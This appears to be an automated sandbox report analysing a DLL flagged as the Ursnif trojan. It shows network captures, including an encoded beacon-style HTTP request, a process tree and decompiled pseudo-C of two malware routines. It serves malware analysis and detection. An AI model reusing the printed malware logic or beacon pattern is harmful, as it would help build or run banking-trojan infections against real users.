Nov 23, 2020 10:01:54.989778042 CET	8.8.8.8	192.168.2.6	0x2b3a	No error (0)	ocsp.sca1b.amazontrust.com		13.224.89.194	A (IP address)	IN (0x0001)
Nov 23, 2020 10:01:54.989778042 CET	8.8.8.8	192.168.2.6	0x2b3a	No error (0)	ocsp.sca1b.amazontrust.com		13.224.89.213	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

ocsp.sca1b.amazontrust.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49775	13.224.89.96	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 23, 2020 10:01:55.015682936 CET	2840	OUT	GET /images/EaRh3KPU8Z7coy/kY49BSPFz6LoeX84d6Nmk/tmvkFayWIoRWEt0L/B4ps7khO_2F9SEG/f9boHEnizBFmGTNyDb/Kge3D9NUI/7_2Fw5RP2M_2BeX2COQk/s_2FybxZe2CPpDEkVp2/8ynz_2BTLv3U3kmn5mpdiz/j3XtWX.avi HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: ocsp.sca1b.amazontrust.com Connection: Keep-Alive
Nov 23, 2020 10:01:55.205692053 CET	3018	IN	HTTP/1.1 200 OK Content-Type: application/ocsp-response Content-Length: 5 Connection: keep-alive Accept-Ranges: bytes Cache-Control: public, max-age=300 Date: Mon, 23 Nov 2020 09:01:55 GMT ETag: "5f4e9af2-5" Last-Modified: Tue, 01 Sep 2020 19:03:14 GMT Server: nginx X-Cache: Miss from cloudfront Via: 1.1 110750d14d1d900cd5c76d0ac872f5dd.cloudfront.net (CloudFront) X-Amz-Cf-Pop: ZRH50-C1 X-Amz-Cf-Id: sHv35CLaSkByjEByKACbJD0KFuoIGTN8uv8sY8T0CzR8JLp0pYTWZw== Data Raw: 30 03 0a 01 06 Data Ascii: 0

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Nov 23, 2020 10:01:17.911014080 CET	151.101.1.44	443	192.168.2.6	49744	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Aug 10 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013	Fri Dec 31 13:00:00 CET 2021 Wed Mar 08 13:00:00 CET 2023	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 23, 2020 10:01:17.911014080 CET	151.101.1.44	443	192.168.2.6	49744	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		9e10692f1b7f78228b2d4e424db3a98c
Nov 23, 2020 10:01:17.911441088 CET	151.101.1.44	443	192.168.2.6	49745	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Aug 10 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013	Fri Dec 31 13:00:00 CET 2021 Wed Mar 08 13:00:00 CET 2023	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 23, 2020 10:01:17.911441088 CET	151.101.1.44	443	192.168.2.6	49745	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		9e10692f1b7f78228b2d4e424db3a98c
Nov 23, 2020 10:01:17.912978888 CET	151.101.1.44	443	192.168.2.6	49748	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Aug 10 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013	Fri Dec 31 13:00:00 CET 2021 Wed Mar 08 13:00:00 CET 2023	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 23, 2020 10:01:17.912978888 CET	151.101.1.44	443	192.168.2.6	49748	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		9e10692f1b7f78228b2d4e424db3a98c
Nov 23, 2020 10:01:17.913294077 CET	151.101.1.44	443	192.168.2.6	49746	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Aug 10 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013	Fri Dec 31 13:00:00 CET 2021 Wed Mar 08 13:00:00 CET 2023	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 23, 2020 10:01:17.913294077 CET	151.101.1.44	443	192.168.2.6	49746	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		9e10692f1b7f78228b2d4e424db3a98c
Nov 23, 2020 10:01:17.915950060 CET	151.101.1.44	443	192.168.2.6	49749	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Aug 10 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013	Fri Dec 31 13:00:00 CET 2021 Wed Mar 08 13:00:00 CET 2023	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 23, 2020 10:01:17.915950060 CET	151.101.1.44	443	192.168.2.6	49749	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		9e10692f1b7f78228b2d4e424db3a98c
Nov 23, 2020 10:01:17.916430950 CET	151.101.1.44	443	192.168.2.6	49747	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Aug 10 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013	Fri Dec 31 13:00:00 CET 2021 Wed Mar 08 13:00:00 CET 2023	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 23, 2020 10:01:17.916430950 CET	151.101.1.44	443	192.168.2.6	49747	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		9e10692f1b7f78228b2d4e424db3a98c
Nov 23, 2020 10:01:17.978466988 CET	87.248.118.22	443	192.168.2.6	49751	CN=*.yahoo.com, O=Oath Inc, L=Sunnyvale, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Sun Nov 15 01:00:00 CET 2020 Tue Oct 22 14:00:00 CEST 2013	Wed Dec 30 00:59:59 CET 2020 Sun Oct 22 14:00:00 CEST 2028	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 23, 2020 10:01:17.978466988 CET	87.248.118.22	443	192.168.2.6	49751	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Oct 22 14:00:00 CEST 2013	Sun Oct 22 14:00:00 CEST 2028		9e10692f1b7f78228b2d4e424db3a98c
Nov 23, 2020 10:01:17.979861975 CET	87.248.118.22	443	192.168.2.6	49750	CN=*.yahoo.com, O=Oath Inc, L=Sunnyvale, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Sun Nov 15 01:00:00 CET 2020 Tue Oct 22 14:00:00 CEST 2013	Wed Dec 30 00:59:59 CET 2020 Sun Oct 22 14:00:00 CEST 2028	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 23, 2020 10:01:17.979861975 CET	87.248.118.22	443	192.168.2.6	49750	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Oct 22 14:00:00 CEST 2013	Sun Oct 22 14:00:00 CEST 2028		9e10692f1b7f78228b2d4e424db3a98c

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 7164 Parent PID: 5940

General

Start time:	10:01:07
Start date:	23/11/2020
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\c0nnect1on.dll'
Imagebase:	0xdc0000
File size:	119808 bytes
MD5 hash:	62442CB29236B024E992A556DA72B97A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: regsvr32.exe PID: 1872 Parent PID: 7164

General

Start time:	10:01:07
Start date:	23/11/2020
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\c0nnect1on.dll
Imagebase:	0xe10000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.385630027.0000000004BD8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000002.601348245.0000000004BD8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.385676545.0000000004BD8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.385708605.0000000004BD8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.385696789.0000000004BD8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.385602285.0000000004BD8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.385720393.0000000004BD8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.385552815.0000000004BD8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.385580205.0000000004BD8000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6320 Parent PID: 7164

General

Start time:	10:01:08
Start date:	23/11/2020
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 4588 Parent PID: 6320

General

Start time:	10:01:08
Start date:	23/11/2020
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Internet Explorer\iexplore.exe
Imagebase:	0x7ff721e20000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 4668 Parent PID: 4588

General

Start time:	10:01:09
Start date:	23/11/2020
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4588 CREDAT:17410 /prefetch:2
Imagebase:	0xf80000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 3000 Parent PID: 4588

General

Start time:	10:01:16
Start date:	23/11/2020
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4588 CREDAT:82952 /prefetch:2
Imagebase:	0xf80000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5672 Parent PID: 4588

General

Start time:	10:01:53
Start date:	23/11/2020
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4588 CREDAT:82956 /prefetch:2
Imagebase:	0x7ff7ae910000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: regsvr32.exe PID: 1872 Parent PID: 7164 regsvr32.exeCOMMON

Executed Functions

Function 00D9523B, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 222
memoryfiletimeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00D9523B(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0xd9d2a0; // 0x59935a40
				_t74 = RtlAllocateHeap( *0xd9d238, 0, _t72 ^ 0x59935b44);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0xd9d2a0; // 0x59935a40
				_t78 = RtlAllocateHeap( *0xd9d238, 0, _t76 ^ 0x59935a4d);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0xd9d238, _t146, _v20);
					goto L36;
				}
				_t136 =  *0xd9d2a0; // 0x59935a40
				memset(_t78, 0, _t136 ^ 0x59935a4d);
				_t81 =  *0xd9d2a4; // 0x3e3a5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0xd9e7e8; // 0x73797325
				_t83 = E00D967CF(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0xd9d238, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x59935a4d;
				_v28.dwHighDateTime = 0x59935a4d;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x59935a4d) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0xd9d2a4; // 0x3e3a5a8
				_t16 = _t93 + 0xd9e809; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}

0x00d95244
0x00d9524a
0x00d9524c
0x00d95266
0x00d95268
0x00d9526d
0x00d954e2
0x00d954e9
0x00d954e9
0x00d95273
0x00d95288
0x00d9528a
0x00d9528c
0x00d95291
0x00d954d2
0x00d954dc
0x00000000
0x00d954dc
0x00d95297
0x00d952a2
0x00d952a7
0x00d952ac
0x00d952af
0x00d952b6
0x00d952bb
0x00d952c0
0x00d954c2
0x00d954cc
0x00000000
0x00d954cc
0x00d952d6
0x00d952da
0x00d952dd
0x00d952e0
0x00d952e6
0x00d952eb
0x00d952f4
0x00d952fa
0x00d95304
0x00d9530b
0x00d9530b
0x00d9531d
0x00d95328
0x00d95336
0x00d9533b
0x00d95340
0x00d95343
0x00d95348
0x00d95352
0x00d95355
0x00d95358
0x00d9536e
0x00d95370
0x00d95375
0x00d954c0
0x00000000
0x00d954c0
0x00d9538c
0x00d953dd
0x00d953a0
0x00d953a8
0x00d953ad
0x00d953bb
0x00d953c4
0x00d953cd
0x00d953cd
0x00d953db
0x00d953db
0x00d953e1
0x00d953e5
0x00d953e5
0x00d953eb
0x00000000
0x00000000
0x00d953ed
0x00d953f3
0x00d9549a
0x00d9549d
0x00d954aa
0x00d954aa
0x00d954ae
0x00000000
0x00000000
0x00d954a3
0x00d954a7
0x00d954a7
0x00d954a9
0x00d954a9
0x00d954b3
0x00d954ba
0x00d954bc
0x00000000
0x00d954bc
0x00d953f9
0x00d953fb
0x00d953fb
0x00d9540e
0x00d95414
0x00d9541f
0x00d95421
0x00d95425
0x00d95427
0x00d95427
0x00d9542c
0x00d9542e
0x00d9542e
0x00d9542c
0x00d95433
0x00d95437
0x00d95437
0x00d95447
0x00d9544c
0x00d9544f
0x00d9544f
0x00d95452
0x00d9545c
0x00d95464
0x00d95469
0x00d95477
0x00d95477
0x00d9548b
0x00d9548f
0x00d9548f

APIs

RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 00D95266
RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 00D95288
memset.NTDLL ref: 00D952A2

Part of subcall function 00D967CF: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,00D952BB,73797325), ref: 00D967E0
Part of subcall function 00D967CF: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00D967FA

CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00D952E0
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00D952F4
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00D9530B
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00D95317
lstrcat.KERNEL32(?,642E2A5C), ref: 00D95358
FindFirstFileA.KERNELBASE(?,?), ref: 00D9536E
CompareFileTime.KERNEL32(?,?), ref: 00D9538C
FindNextFileA.KERNELBASE(00D9857A,?), ref: 00D953A0
FindClose.KERNEL32(00D9857A), ref: 00D953AD
FindFirstFileA.KERNEL32(?,?), ref: 00D953B9
CompareFileTime.KERNEL32(?,?), ref: 00D953DB
StrChrA.SHLWAPI(?,0000002E), ref: 00D9540E
memcpy.NTDLL(00000000,?,00000000), ref: 00D95447
FindNextFileA.KERNELBASE(00D9857A,?), ref: 00D9545C
FindClose.KERNEL32(00D9857A), ref: 00D95469
FindFirstFileA.KERNEL32(?,?), ref: 00D95475
CompareFileTime.KERNEL32(?,?), ref: 00D95485
FindClose.KERNELBASE(00D9857A), ref: 00D954BA
HeapFree.KERNEL32(00000000,00000000,73797325), ref: 00D954CC
HeapFree.KERNEL32(00000000,?), ref: 00D954DC

Strings

Uxt, xrefs: 00D954CC, 00D954DC

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
String ID: Uxt
API String ID: 2944988578-1536154274
Opcode ID: 439f7f2e2743ae8d65b5e9798d511dc1863463ffc6049959931f52c31837e237
Instruction ID: 64af3dfb2f710a6df7926684a2cb0343153facd2028cbbd9d64f7e40715707ac
Opcode Fuzzy Hash: 439f7f2e2743ae8d65b5e9798d511dc1863463ffc6049959931f52c31837e237
Instruction Fuzzy Hash: 58813872900219EFDF11DFA5DC88AEEBBB9FF48301F14056AE509E6260D7719A85CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00511006, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00511006(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L00512180();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x514144;
				_push(_t15 + 0x51505e);
				_push(_t15 + 0x515054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L0051217A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x514148, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x00511006
0x0051100f
0x00511013
0x00511019
0x0051101e
0x00511023
0x00511026
0x00511029
0x0051102e
0x0051102f
0x00511032
0x0051103d
0x00511044
0x00511048
0x0051104a
0x0051104b
0x0051104e
0x00511053
0x0051105d
0x0051105f
0x0051105f
0x00511073
0x00511079
0x0051107d
0x005110cd
0x0051107f
0x00511088
0x0051109e
0x005110a6
0x005110b8
0x005110bc
0x00000000
0x00000000
0x005110a8
0x005110ab
0x005110b0
0x005110b2
0x005110b2
0x00511093
0x00511095
0x005110be
0x005110bf
0x005110bf
0x00511088
0x005110d5

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00511013
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00511029
_snwprintf.NTDLL ref: 0051104E
CreateFileMappingW.KERNELBASE(000000FF,00514148,00000004,00000000,?,?), ref: 00511073
GetLastError.KERNEL32 ref: 0051108A
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 0051109E
GetLastError.KERNEL32 ref: 005110B6
CloseHandle.KERNEL32(00000000), ref: 005110BF
GetLastError.KERNEL32 ref: 005110C7

Strings

`RxtAxt, xrefs: 00511013

Memory Dump Source

Source File: 00000001.00000002.599968385.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true

Associated: 00000001.00000002.599974897.0000000000515000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.599996450.0000000000517000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID: `RxtAxt
API String ID: 1724014008-1376811538
Opcode ID: e4a62542c983bacc7ea2a1955bf0626cb3227eab05440f559c7a9f38d9d1aa28
Instruction ID: 97c3538c342e019642a445c9d7de7f25850cafb280b2ea6285014ef6dfcf0e76
